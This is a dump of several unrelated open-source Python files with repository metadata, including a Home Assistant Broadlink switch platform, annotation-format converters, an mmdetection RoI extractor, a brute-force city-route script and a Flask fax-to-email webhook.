vol.Optional(CONF_SWITCHES, default=[]): vol.Any(
cv.schema_with_slug_keys(OLD_SWITCH_SCHEMA),
vol.All(cv.ensure_list, [SWITCH_SCHEMA]),
),
}
),
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Import the device and set up custom switches.
This is for backward compatibility.
Do not use this method.
"""
mac_addr = config[CONF_MAC]
host = config.get(CONF_HOST)
switches = config.get(CONF_SWITCHES)
if not isinstance(switches, list):
switches = [
{CONF_NAME: switch.pop(CONF_FRIENDLY_NAME, name), **switch}
for name, switch in switches.items()
]
_LOGGER.warning(
"Your configuration for the switch platform is deprecated. "
"Please refer to the Broadlink documentation to catch up"
)
if switches:
platform_data = hass.data[DOMAIN].platforms.setdefault(SWITCH_DOMAIN, {})
platform_data.setdefault(mac_addr, []).extend(switches)
else:
_LOGGER.warning(
"The switch platform is deprecated, except for custom IR/RF "
"switches. Please refer to the Broadlink documentation to "
"catch up"
)
if host:
import_device(hass, host)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Broadlink switch."""
device = hass.data[DOMAIN].devices[config_entry.entry_id]
if device.api.type in {"RM2", "RM4"}:
platform_data = hass.data[DOMAIN].platforms.get(SWITCH_DOMAIN, {})
user_defined_switches = platform_data.get(device.api.mac, {})
switches = [
BroadlinkRMSwitch(device, config) for config in user_defined_switches
]
elif device.api.type == "SP1":
switches = [BroadlinkSP1Switch(device)]
elif device.api.type == "SP2":
switches = [BroadlinkSP2Switch(device)]
elif device.api.type == "MP1":
switches = [BroadlinkMP1Slot(device, slot) for slot in range(1, 5)]
async_add_entities(switches)
class BroadlinkSwitch(SwitchEntity, RestoreEntity, ABC):
"""Representation of a Broadlink switch."""
def __init__(self, device, command_on, command_off):
"""Initialize the switch."""
self._device = device
self._command_on = command_on
self._command_off = command_off
self._coordinator = device.update_manager.coordinator
self._device_class = None
self._state = None
@property
def name(self):
"""Return the name of the switch."""
return f"{self._device.name} Switch"
@property
def assumed_state(self):
"""Return True if unable to access real state of the switch."""
return True
@property
def available(self):
"""Return True if the switch is available."""
return self._device.update_manager.available
@property
def is_on(self):
"""Return True if the switch is on."""
return self._state
@property
def should_poll(self):
"""Return True if the switch has to be polled for state."""
return False
@property
def device_class(self):
"""Return device class."""
return self._device_class
@property
def device_info(self):
"""Return device info."""
return {
"identifiers": {(DOMAIN, self._device.unique_id)},
"manufacturer": self._device.api.manufacturer,
"model": self._device.api.model,
"name": self._device.name,
"sw_version": self._device.fw_version,
}
@callback
def update_data(self):
"""Update data."""
self.async_write_ha_state()
async def async_added_to_hass(self):
"""Call when the switch is added to hass."""
if self._state is None:
state = await self.async_get_last_state()
self._state = state is not None and state.state == STATE_ON
self.async_on_remove(self._coordinator.async_add_listener(self.update_data))
async def async_update(self):
"""Update the switch."""
await self._coordinator.async_request_refresh()
async def async_turn_on(self, **kwargs):
"""Turn on the switch."""
if await self._async_send_packet(self._command_on):
self._state = True
self.async_write_ha_state()
async def async_turn_off(self, **kwargs):
"""Turn off the switch."""
if await self._async_send_packet(self._command_off):
self._state = False
self.async_write_ha_state()
@abstractmethod
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
class BroadlinkRMSwitch(BroadlinkSwitch):
"""Representation of a Broadlink RM switch."""
def __init__(self, device, config):
"""Initialize the switch."""
super().__init__(
device, config.get(CONF_COMMAND_ON), config.get(CONF_COMMAND_OFF)
)
self._name = config[CONF_NAME]
@property
def name(self):
"""Return the name of the switch."""
return self._name
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
if packet is None:
return True
try:
await self._device.async_request(self._device.api.send_data, packet)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
class BroadlinkSP1Switch(BroadlinkSwitch):
"""Representation of a Broadlink SP1 switch."""
def __init__(self, device):
"""Initialize the switch."""
super().__init__(device, 1, 0)
self._device_class = DEVICE_CLASS_OUTLET
@property
def unique_id(self):
"""Return the unique id of the switch."""
return self._device.unique_id
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
try:
await self._device.async_request(self._device.api.set_power, packet)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
class BroadlinkSP2Switch(BroadlinkSP1Switch):
"""Representation of a Broadlink SP2 switch."""
def __init__(self, device, *args, **kwargs):
"""Initialize the switch."""
super().__init__(device, *args, **kwargs)
self._state = self._coordinator.data["state"]
self._load_power = self._coordinator.data["load_power"]
if device.api.model == "SC1":
self._device_class = DEVICE_CLASS_SWITCH
@property
def assumed_state(self):
"""Return True if unable to access real state of the switch."""
return False
@property
def current_power_w(self):
"""Return the current power usage in Watt."""
return self._load_power
@callback
def update_data(self):
"""Update data."""
if self._coordinator.last_update_success:
self._state = self._coordinator.data["state"]
self._load_power = self._coordinator.data["load_power"]
self.async_write_ha_state()
class BroadlinkMP1Slot(BroadlinkSwitch):
"""Representation of a Broadlink MP1 slot."""
def __init__(self, device, slot):
"""Initialize the switch."""
super().__init__(device, 1, 0)
self._slot = slot
self._state = self._coordinator.data[f"s{slot}"]
self._device_class = DEVICE_CLASS_OUTLET
@property
def unique_id(self):
"""Return the unique id of the slot."""
return f"{self._device.unique_id}-s{self._slot}"
@property
def name(self):
"""Return the name of the switch."""
return f"{self._device.name} S{self._slot}"
@property
def assumed_state(self):
"""Return True if unable to access real state of the switch."""
return False
@callback
def update_data(self):
"""Update data."""
if self._coordinator.last_update_success:
self._state = self._coordinator.data[f"s{self._slot}"]
self.async_write_ha_state()
async def _async_send_packet(self, packet):
"""Send a packet to the device."""
try:
await self._device.async_request(
self._device.api.set_power, self._slot, packet
)
except (BroadlinkException, OSError) as err:
_LOGGER.error("Failed to send packet: %s", err)
return False
return True
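
# Hedged sketch, not part of the integration: it only illustrates the pattern the
# classes above share -- subclass BroadlinkSwitch and implement _async_send_packet().
# It assumes the base class stores the device as self._device, as the subclasses
# above do; everything else here is a hypothetical placeholder.
class BroadlinkExampleSwitch(BroadlinkSwitch):
    """Example switch that sends raw packets through the device API."""

    async def _async_send_packet(self, packet):
        """Send a packet to the device and report success."""
        if packet is None:
            # Nothing to send counts as success, mirroring BroadlinkRMSwitch.
            return True
        try:
            await self._device.async_request(self._device.api.send_data, packet)
        except (BroadlinkException, OSError) as err:
            _LOGGER.error("Failed to send packet: %s", err)
            return False
        return True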
| 30.141593
| 86
| 0.637698
|
d19a93e9cd58cd77060618c6ee2657e55c558c26
| 5,959
|
py
|
Python
|
ImgAnn/convert.py
|
nipdep/img-ann
|
a144136de981dc3dc28f4ed5c206ca9e195ad274
|
[
"MIT"
] | 2
|
2021-01-14T11:23:52.000Z
|
2021-08-30T03:15:20.000Z
|
ImgAnn/convert.py
|
nipdep/img-ann
|
a144136de981dc3dc28f4ed5c206ca9e195ad274
|
[
"MIT"
] | 4
|
2020-12-16T16:48:56.000Z
|
2021-07-01T02:48:07.000Z
|
ImgAnn/convert.py
|
nipdep/img-ann
|
a144136de981dc3dc28f4ed5c206ca9e195ad274
|
[
"MIT"
] | 1
|
2021-07-01T01:07:28.000Z
|
2021-07-01T01:07:28.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from .operators.imgdata import ImgData
from .operators import coco, csv, pascalvoc
import logging
import os
# set logger
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class Convertor:
""" convert method implementation class """
@classmethod
def coco2csv(cls, dataset_dir: str,
coco_ann_dir: str,
save_dir: str):
""" convert coco to csv
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param coco_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
imgdataset = ImgData.extract(dataset_dir)
coco_obj = coco.COCO(imgdataset.dataset)
coco_obj.extract(coco_ann_dir)
df = coco_obj.get_dataset()
ann, clas = coco_obj.get_annotations()
csv_obj = csv.CSV(df)
csv_obj.set_annotations(ann)
csv_obj.set_classes(clas)
csv_fomatted = csv_obj.translate()
csv_obj.archive(save_dir, csv_fomatted)
@staticmethod
def coco2voc(dataset_dir: str,
coco_ann_dir: str,
save_dir: str):
""" convert coco to pascal VOC
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param coco_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
if not os.path.exists(save_dir):
os.makedirs(save_dir)
imgdataset = ImgData.extract(dataset_dir)
coco_obj = coco.COCO(imgdataset.dataset)
coco_obj.extract(coco_ann_dir)
df = coco_obj.get_dataset()
ann, cls = coco_obj.get_annotations()
voc_obj = pascalvoc.PascalVOC(df)
voc_obj.set_annotations(ann)
voc_obj.set_classes(cls)
for xml, name in voc_obj.translate():
file_dir = save_dir + '/' + name.split('.')[0]+'.xml'
voc_obj.archive(file_dir, xml)
@staticmethod
def csv2coco(dataset_dir: str,
csv_ann_dir: str,
save_dir: str):
""" convert .csv into coco
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param csv_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
imagedataset = ImgData.extract(dataset_dir)
csv_obj = csv.CSV(imagedataset.dataset)
csv_obj.extract(csv_ann_dir)
df = csv_obj.get_dataset()
ann, cls = csv_obj.get_annotations()
coco_obj = coco.COCO(df)
coco_obj.set_annotations(ann)
coco_obj.set_classes(cls)
data = coco_obj.translate()
coco_obj.archive(save_dir, data)
@staticmethod
def csv2voc(dataset_dir: str,
csv_ann_dir: str,
save_dir: str):
""" convert .csv into pascal VOC
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param csv_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
if not os.path.exists(save_dir):
os.makedirs(save_dir)
imagedataset = ImgData.extract(dataset_dir)
csv_obj = csv.CSV(imagedataset.dataset)
csv_obj.extract(csv_ann_dir)
df = csv_obj.get_dataset()
ann, cls = csv_obj.get_annotations()
voc_obj = pascalvoc.PascalVOC(df)
voc_obj.set_annotations(ann)
voc_obj.set_classes(cls)
for xml, name in voc_obj.translate():
file_dir = save_dir + '/' + name.split('.')[0]+'.xml'
voc_obj.archive(file_dir, xml)
@staticmethod
def voc2coco(dataset_dir: str,
voc_ann_dir: str,
save_dir: str):
""" convert pascal VOC into coco
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param voc_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
imagedataset = ImgData.extract(dataset_dir)
voc_obj = pascalvoc.PascalVOC(imagedataset.dataset)
voc_obj.extract(voc_ann_dir)
df = voc_obj.get_dataset()
ann, cls = voc_obj.get_annotations()
coco_obj = coco.COCO(df)
coco_obj.set_annotations(ann)
coco_obj.set_classes(cls)
data = coco_obj.translate()
coco_obj.archive(save_dir, data)
@staticmethod
def voc2csv(dataset_dir: str,
voc_ann_dir: str,
save_dir: str):
""" convert pascal VOC into .csv
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param voc_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
imagedataset = ImgData.extract(dataset_dir)
voc_obj = pascalvoc.PascalVOC(imagedataset.dataset)
voc_obj.extract(voc_ann_dir)
df = voc_obj.get_dataset()
ann, cls = voc_obj.get_annotations()
csv_obj = csv.CSV(df)
csv_obj.set_annotations(ann)
csv_obj.set_classes(cls)
csv_fomatted = csv_obj.translate()
csv_obj.archive(save_dir, csv_fomatted)
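
# Hedged usage sketch (not part of the library): the paths below are made-up
# placeholders; a real call needs a dataset laid out the way ImgData.extract()
# expects and an annotation file in the matching source format.
if __name__ == "__main__":
    # COCO annotations -> one .csv file
    Convertor.coco2csv(dataset_dir="./images",
                       coco_ann_dir="./annotations/coco.json",
                       save_dir="./out/annotations.csv")
    # COCO annotations -> one Pascal VOC .xml file per image
    Convertor.coco2voc(dataset_dir="./images",
                       coco_ann_dir="./annotations/coco.json",
                       save_dir="./out/voc")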
| 36.335366
| 116
| 0.639201
|
c0f37ebf2b3997fcd728c5a9c93ed47c5865338a
| 639
|
py
|
Python
|
gupb/controller/__init__.py
|
Lipskoe/GUPB
|
0dd0e6ff2603465aa1ebb514a7745eb09726b447
|
[
"MIT"
] | 6
|
2020-10-06T14:29:45.000Z
|
2020-10-18T22:45:39.000Z
|
gupb/controller/__init__.py
|
Lipskoe/GUPB
|
0dd0e6ff2603465aa1ebb514a7745eb09726b447
|
[
"MIT"
] | 8
|
2020-10-10T10:36:21.000Z
|
2022-01-02T14:10:07.000Z
|
gupb/controller/__init__.py
|
Lipskoe/GUPB
|
0dd0e6ff2603465aa1ebb514a7745eb09726b447
|
[
"MIT"
] | 17
|
2020-10-08T19:08:45.000Z
|
2022-01-17T02:40:30.000Z
|
from abc import abstractmethod
from typing import Protocol
from gupb.model import arenas
from gupb.model import characters
class Controller(Protocol):
@abstractmethod
def reset(self, arena_description: arenas.ArenaDescription) -> None:
raise NotImplementedError
@abstractmethod
def decide(self, knowledge: characters.ChampionKnowledge) -> characters.Action:
raise NotImplementedError
@property
@abstractmethod
def name(self) -> str:
raise NotImplementedError
@property
@abstractmethod
def preferred_tabard(self) -> characters.Tabard:
raise NotImplementedError
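
# Hedged sketch of a concrete controller satisfying the Protocol above; the
# specific Action and Tabard members used below are assumptions and may need to
# be adjusted to the real enums in gupb.model.characters.
class IdleController:
    """Minimal bot that never moves -- only meant to show the required interface."""

    def __init__(self, name: str = "IdleController") -> None:
        self._name = name

    def reset(self, arena_description: arenas.ArenaDescription) -> None:
        pass

    def decide(self, knowledge: characters.ChampionKnowledge) -> characters.Action:
        return characters.Action.DO_NOTHING  # assumed enum member

    @property
    def name(self) -> str:
        return self._name

    @property
    def preferred_tabard(self) -> characters.Tabard:
        return characters.Tabard.GREY  # assumed enum member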
| 23.666667
| 83
| 0.733959
|
ba2b2f7e6638f73a58005ef1b1abc5791582e221
| 315
|
py
|
Python
|
users/migrations/0002_remove_profile_email.py
|
wadi-1000/Therapi
|
f18268be821d7a73b6e0cc0f10dad91efbd05dba
|
[
"MIT"
] | null | null | null |
users/migrations/0002_remove_profile_email.py
|
wadi-1000/Therapi
|
f18268be821d7a73b6e0cc0f10dad91efbd05dba
|
[
"MIT"
] | null | null | null |
users/migrations/0002_remove_profile_email.py
|
wadi-1000/Therapi
|
f18268be821d7a73b6e0cc0f10dad91efbd05dba
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-09-29 12:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='email',
),
]
| 17.5
| 47
| 0.574603
|
4335b4c0d77752f25a02081ababc27baabc917ad
| 1,783
|
py
|
Python
|
hamilton.py
|
bturkoglu/hamilton-path-using-python-with-turkey-cities
|
c627b2077fe3de9427806886ad3cd26ac2a4d5ab
|
[
"MIT"
] | 1
|
2022-02-23T16:09:39.000Z
|
2022-02-23T16:09:39.000Z
|
hamilton.py
|
bturkoglu/hamilton-path-using-python-with-turkey-cities
|
c627b2077fe3de9427806886ad3cd26ac2a4d5ab
|
[
"MIT"
] | null | null | null |
hamilton.py
|
bturkoglu/hamilton-path-using-python-with-turkey-cities
|
c627b2077fe3de9427806886ad3cd26ac2a4d5ab
|
[
"MIT"
] | null | null | null |
import itertools
def dosyaoku():
baslik = True
with open(dosya,'r') as f:
for line in f:
satir = line.strip().split(sep='\t')
print('satir:',satir)
if baslik:
baslik = False
for s in satir:
sehirler.append(s)
print('Sehirler:',sehirler)
continue
sehir = satir[0]
for sira, mesafe in enumerate(satir[1:]):
anahtar = (sehir, sehirler[sira])
mesafeler[anahtar] = int(mesafe)
print('Mesafeler:',mesafeler)
def hesapla():
global ilk_sehir, gezinti_sehirleri
    # gezinti_sehirleri will be converted to a set; if ilk_sehir is in the set, it will be removed from it.
# gezintiKumesi = set(gezinti_sehirleri)
# gezintiKumesi.discard(ilk_sehir)
gezintiKumesi = gezinti_sehirleri
sehir_adedi = len(gezintiKumesi)
en_kisa_mesafe = 1e10
en_kisa_yol = ''
    # P(gezintiKumesi, sehir_adedi), i.e. all permutations of the set, will be generated.
for kume in itertools.permutations(gezintiKumesi, sehir_adedi):
yolsirasi =(ilk_sehir,) + kume + (ilk_sehir,)
topmesafe = 0
for i in range(len(yolsirasi)-1):
anahtar = (yolsirasi[i], yolsirasi[i+1])
topmesafe += mesafeler[anahtar]
print('Mesafe: %5d Yol Sirasi: %s' % (topmesafe, yolsirasi))
if en_kisa_mesafe > topmesafe:
en_kisa_mesafe = topmesafe
en_kisa_yol = yolsirasi
print('SONUÇ: En Kısa Mesafe: %5d En Kısa Yol Sirasi: %s' % (en_kisa_mesafe, en_kisa_yol))
sehirler = list()
mesafeler = dict()
ilk_sehir = 'a'
gezinti_sehirleri = ('b','c','d','e')
dosya = 'yol1.txt'
dosyaoku()
hesapla()
input('ikincitest için bir tuşa basınız')  # "press a key for the second test"
sehirler = list()
mesafeler = dict()
ilk_sehir = 'Konya'
gezinti_sehirleri = ('Ankara','Bursa','Eskişehir','Antalya')
dosya = 'turkiye.txt'
dosyaoku()
hesapla()
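
# Hedged helper, not part of the original script: it documents the tab-separated
# input format that dosyaoku() appears to expect -- a header row listing the city
# names, then one row per city giving its distance to every header city. The
# numbers and file name below are made up purely for illustration.
def ornek_matris_yaz(dosya_adi='ornek_yol.txt'):
    satirlar = [
        'a\tb\tc',
        'a\t0\t10\t15',
        'b\t10\t0\t35',
        'c\t15\t35\t0',
    ]
    with open(dosya_adi, 'w') as f:
        f.write('\n'.join(satirlar) + '\n')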
| 22.858974
| 94
| 0.668536
|
dadf313b8e4f35583ea5039667e383401e29cffe
| 3,222
|
py
|
Python
|
mmdetection/mmdet/models/roi_heads/roi_extractors/generic_roi_extractor.py
|
lizhaoliu-Lec/Conformer
|
577cff26b78b338f035c075727c408fca3272208
|
[
"Apache-2.0"
] | null | null | null |
mmdetection/mmdet/models/roi_heads/roi_extractors/generic_roi_extractor.py
|
lizhaoliu-Lec/Conformer
|
577cff26b78b338f035c075727c408fca3272208
|
[
"Apache-2.0"
] | null | null | null |
mmdetection/mmdet/models/roi_heads/roi_extractors/generic_roi_extractor.py
|
lizhaoliu-Lec/Conformer
|
577cff26b78b338f035c075727c408fca3272208
|
[
"Apache-2.0"
] | null | null | null |
from mmcv.cnn.bricks import build_plugin_layer
from mmcv.runner import force_fp32
from mmdet.models.builder import ROI_EXTRACTORS
from .base_roi_extractor import BaseRoIExtractor
@ROI_EXTRACTORS.register_module()
class GenericRoIExtractor(BaseRoIExtractor):
"""Extract RoI features from all level feature maps levels.
This is the implementation of `A novel Region of Interest Extraction Layer
for Instance Segmentation <https://arxiv.org/abs/2004.13665>`_.
Args:
aggregation (str): The method to aggregate multiple feature maps.
Options are 'sum', 'concat'. Default: 'sum'.
pre_cfg (dict | None): Specify pre-processing modules. Default: None.
post_cfg (dict | None): Specify post-processing modules. Default: None.
kwargs (keyword arguments): Arguments that are the same
as :class:`BaseRoIExtractor`.
"""
def __init__(self,
aggregation='sum',
pre_cfg=None,
post_cfg=None,
**kwargs):
super(GenericRoIExtractor, self).__init__(**kwargs)
assert aggregation in ['sum', 'concat']
self.aggregation = aggregation
self.with_post = post_cfg is not None
self.with_pre = pre_cfg is not None
# build pre/post processing modules
if self.with_post:
self.post_module = build_plugin_layer(post_cfg, '_post_module')[1]
if self.with_pre:
self.pre_module = build_plugin_layer(pre_cfg, '_pre_module')[1]
@force_fp32(apply_to=('feats',), out_fp16=True)
def forward(self, feats, rois, roi_scale_factor=None):
"""Forward function."""
if len(feats) == 1:
return self.roi_layers[0](feats[0], rois)
out_size = self.roi_layers[0].output_size
num_levels = len(feats)
roi_feats = feats[0].new_zeros(
rois.size(0), self.out_channels, *out_size)
        # sometimes rois is an empty tensor
if roi_feats.shape[0] == 0:
return roi_feats
if roi_scale_factor is not None:
rois = self.roi_rescale(rois, roi_scale_factor)
# mark the starting channels for concat mode
start_channels = 0
for i in range(num_levels):
roi_feats_t = self.roi_layers[i](feats[i], rois)
end_channels = start_channels + roi_feats_t.size(1)
if self.with_pre:
# apply pre-processing to a RoI extracted from each layer
roi_feats_t = self.pre_module(roi_feats_t)
if self.aggregation == 'sum':
# and sum them all
roi_feats += roi_feats_t
else:
# and concat them along channel dimension
roi_feats[:, start_channels:end_channels] = roi_feats_t
# update channels starting position
start_channels = end_channels
# check if concat channels match at the end
if self.aggregation == 'concat':
assert start_channels == self.out_channels
if self.with_post:
# apply post-processing before return the result
roi_feats = self.post_module(roi_feats)
return roi_feats
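
# Hedged configuration sketch (not taken from the mmdetection docs): roughly how
# GenericRoIExtractor could be selected inside a detector config. roi_layer,
# out_channels and featmap_strides are the usual BaseRoIExtractor arguments; the
# values below are illustrative only.
_example_roi_extractor_cfg = dict(
    type='GenericRoIExtractor',
    aggregation='sum',
    roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
    out_channels=256,
    featmap_strides=[4, 8, 16, 32],
    pre_cfg=None,
    post_cfg=None)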
| 38.357143
| 79
| 0.629112
|
f4d9cb02880f5f130f70dc4bd3e9255902c26d52
| 7,033
|
py
|
Python
|
pyhonScripts/transform_vnp_html_cmd_v4.py
|
markfawcett/business-papers
|
2f1d71079cd33a722ac8f419c76cd7a4227b482d
|
[
"BSD-3-Clause"
] | null | null | null |
pyhonScripts/transform_vnp_html_cmd_v4.py
|
markfawcett/business-papers
|
2f1d71079cd33a722ac8f419c76cd7a4227b482d
|
[
"BSD-3-Clause"
] | 5
|
2020-06-27T18:11:38.000Z
|
2021-05-21T16:31:02.000Z
|
pyhonScripts/transform_vnp_html_cmd_v4.py
|
markfawcett/business-papers
|
2f1d71079cd33a722ac8f419c76cd7a4227b482d
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/local/bin/python3
# module needed to parse command line arguments
import sys
# for parsing and sorting XML
from lxml import html # type: ignore
from lxml.etree import SubElement, iselement # type: ignore
# stuff needed for working with file paths
# from os import path
from pathlib import Path
# regular expresions
import re
# for getting todays date
from datetime import date
# global variables you may want to change
file_extension = '.html' # this is added to with the date in a particular form
def main():
if len(sys.argv) != 4:
print("\nThis script takes 3 arguments:\n1.\tThe path to the file you want to porces.\n2.\tthe template file name.\n3.\tThe VnP date in the form YYMMDD")
exit()
input_file_name = sys.argv[1]
template_file_name = sys.argv[2]
today_string = sys.argv[3]
fix_VnP_HTML(input_file_name, template_file_name, today_string=today_string)
def fix_VnP_HTML(input_file_name: str, template_file_name: str,
today_string: str = '', output_folder: str = '') -> Path:
    # first print the full location of the input file
print('Input file is at: {}'.format(Path(input_file_name).resolve()))
input_root = html.parse(input_file_name).getroot()
output_tree = html.parse(template_file_name)
output_root = output_tree.getroot()
# first get the VnP number from the input
vnP_number_element = input_root.find('.//div[@class="VnPNumberBox"]/p')
if iselement(vnP_number_element) and vnP_number_element.text:
vnP_number = vnP_number_element.text
else:
vnP_number = ''
# print(vnP_number)
    # add this to the output
meta_source = output_root.find('head/meta[@name="Source"]')
if iselement(meta_source) and 'content' in meta_source.attrib:
meta_source.attrib['content'] += ' ' + vnP_number
title_element = output_root.find('head/title')
if iselement(title_element) and title_element.text:
title_element.text += ' ' + vnP_number + ')'
issueNumberParra = output_root.find('.//p[@class="VPIssueNumber"]')
if iselement(issueNumberParra):
issueNumberParra.text = vnP_number
# now get the date from the input
date_element = input_root.find('.//*[@class="DateTitle"]')
if date_element is not None and date_element.text:
vnP_day_of_week = date_element.text.split(' ', 1)[0]
vnP_date = date_element.text.split(' ', 1)[1]
else:
vnP_day_of_week = 'Noday'
vnP_date = 'Num Month Year'
# add this to the output
h1_title = output_root.find('.//h1[@id="mainTitle"]')
if h1_title is not None:
h1_title.text = 'Votes and Proceedings'
SubElement(h1_title, 'br').tail = f'{vnP_day_of_week} {vnP_date}'
    # also add the date to the bottom of the page
# prepared_date_element = output_root.find('.//div[@id="footerBlockDate"]/p')
# if prepared_date_element is not None and prepared_date_element.text:
# prepared_date_element.text += vnP_date
    # insert a heading called 'Chamber business':
    # if there is a first timing paragraph (e.g. 'The House met at ...'), put the 'Chamber business' heading before it
xpath = '//p[contains(@class,"ItemTimingHeading")]'
first_p = input_root.xpath(xpath)
if len(first_p):
new_heading = html.Element('h2')
new_heading.text = 'Chamber business'
new_heading.classes.add('underline')
first_p[0].getparent().insert(0, new_heading)
# change the input root so that all the paragraphs with numbered spans have another span
spans = input_root.findall('.//p[@class="numbered InDesignBold"]/span[last()]')
# print(spans)
for span in spans:
if span.tail:
temp_text = span.tail
else:
temp_text = ''
span.tail = None
span_parent_para = span.getparent()
span_parent_para.append(html.fromstring('<span class="text">' + temp_text + '</span>'))
    # Add IDs and permanent anchors to the html
# Added at the request of IDMS
# need to get all the heading elements
xpath = '//*[@class="numbered InDesignBold"]/span[@class="text"]|//h2[@class="underline"]|//h3'
linkables = input_root.xpath(xpath)
# print(len(linkables))
for i, heading in enumerate(linkables):
# generate id text
id_text = f'anchor-{i}'
if heading.get('id', default=None):
heading.set('name', heading.get('id'))
heading.set('id', id_text)
# adding this will add the anchor to the last span
spans = heading.xpath('./span[normalize-space(text())]|./strong[normalize-space(text())]')
if len(spans) > 1:
heading = spans[-1]
anchor = SubElement(heading, 'a')
permalink_for = 'Permalink for ' + heading.text_content()
anchor.set('href', '#' + id_text)
anchor.set('aria-label', 'Anchor')
anchor.set('title', permalink_for)
anchor.set('data-anchor-icon', '§')
anchor.set('class', 'anchor-link')
# do some clean ups
for em in input_root.xpath('//em[@class="Oblique"]'):
em.classes.remove('Oblique')
for strong in input_root.xpath('//strong[@class="_5-bold"]'):
strong.classes.remove('_5-bold')
# get a handle in the output root for appending stuff from the input
append_point = output_root.find('.//div[@id="content-goes-here"]')
# append_point.append(html.fromstring('<p class="VPIssueNumber">' + vnP_number + '</p>'))
if append_point is None:
        input('Error: The template root does not have a div with an id of "content-goes-here" '
              'so the script does not know where to put the elements from the input')
exit()
# put the main text flow into the output
main_text_flow_element = input_root.find('.//div[@class="MainTextFlow"]')
append_point.extend(main_text_flow_element)
    if not today_string:
output_file_name = get_date_short() + file_extension
else:
output_file_name = today_string + file_extension
output_file_name = f'vnp{output_file_name}'
if output_folder:
output_file_path = Path(output_folder).joinpath(output_file_name)
else:
# output_file_path = path.join(base_path, output_file_name)
output_file_path = Path(input_file_name).parent.joinpath(output_file_name)
output_tree.write(str(output_file_path), encoding='UTF-8', method="html", xml_declaration=False)
print(f'Output file is at: {output_file_path.resolve()}')
return output_file_path
def do_find_n_replaces(string):
string = re.sub(r'> +', '>', string)
string = re.sub(r' +<', '<', string)
string = string.replace('&amp;nbsp;', ' ')
return string
def delete_element(element):
if iselement(element):
element.getparent().remove(element)
def get_date_short():
# get a date object for today
today = date.today()
# date string in the form 170627
today_string = today.strftime('%y%m%d')
return today_string
if __name__ == "__main__": main()
| 37.609626
| 161
| 0.664439
|
7c867f47524787bce4ebb07b2ed4bf83258427ed
| 895
|
py
|
Python
|
Fax/Forwarding Incoming Faxes to Email with Python/app.py
|
Slamhaus/guides
|
1bcf2997f52a0d2440ae447b2986c70695fa24ef
|
[
"MIT"
] | 1
|
2022-01-19T22:10:28.000Z
|
2022-01-19T22:10:28.000Z
|
Fax/Forwarding Incoming Faxes to Email with Python/app.py
|
Slamhaus/guides
|
1bcf2997f52a0d2440ae447b2986c70695fa24ef
|
[
"MIT"
] | 1
|
2022-02-21T10:39:36.000Z
|
2022-02-21T10:39:36.000Z
|
Fax/Forwarding Incoming Faxes to Email with Python/app.py
|
Slamhaus/guides
|
1bcf2997f52a0d2440ae447b2986c70695fa24ef
|
[
"MIT"
] | 3
|
2022-01-14T19:01:44.000Z
|
2022-03-31T00:51:52.000Z
|
import os
import requests
import pprint
from flask import Flask, request
app = Flask(__name__)
# Listen on route '/fax-webhook' for incoming POST requests when a fax comes in
@app.route('/fax-webhook', methods=['POST'])
def fax_webhook():
# Forward incoming form data to email
send_email(pprint.pformat(request.form, indent=4))
return "200"
# Send email using MailGun API
def send_email(body):
return requests.post(
"https://api.mailgun.net/v3/" + os.environ['MAILGUN_DOMAIN'] + "/messages",
auth=("api", os.environ['MAILGUN_API_TOKEN']),
data={"from": os.environ['EMAIL_FROM'],
"to": [os.environ['EMAIL_TO']],
"subject": os.environ['EMAIL_SUBJECT'],
"text": body})
# Listen on '/' for default requests
@app.route('/')
def hello():
return "Hello World!"
if __name__ == '__main__':
app.run()
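
# Hedged local-test sketch, not part of the guide: the app reads MAILGUN_DOMAIN,
# MAILGUN_API_TOKEN, EMAIL_FROM, EMAIL_TO and EMAIL_SUBJECT from the environment.
# The form fields below are made-up placeholders; whatever form data arrives is
# simply forwarded to the configured email address.
def _example_simulate_incoming_fax(base_url="http://127.0.0.1:5000"):
    return requests.post(base_url + "/fax-webhook",
                         data={"FaxSid": "FX123", "From": "+15550001111"})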
| 24.861111
| 83
| 0.639106
|
a3354f0f72729a8ff81ffb98fdca1c1c42dd849d
| 3,448
|
py
|
Python
|
trains/binding/frameworks/pytorch_bind.py
|
HubBucket-Team/trains
|
c817255a88e5c793b3fbc5b74eb9d5b1fc54ec2b
|
[
"Apache-2.0"
] | 1
|
2019-08-19T04:17:13.000Z
|
2019-08-19T04:17:13.000Z
|
trains/binding/frameworks/pytorch_bind.py
|
VonRosenchild/trains
|
c817255a88e5c793b3fbc5b74eb9d5b1fc54ec2b
|
[
"Apache-2.0"
] | null | null | null |
trains/binding/frameworks/pytorch_bind.py
|
VonRosenchild/trains
|
c817255a88e5c793b3fbc5b74eb9d5b1fc54ec2b
|
[
"Apache-2.0"
] | 1
|
2019-08-19T04:17:15.000Z
|
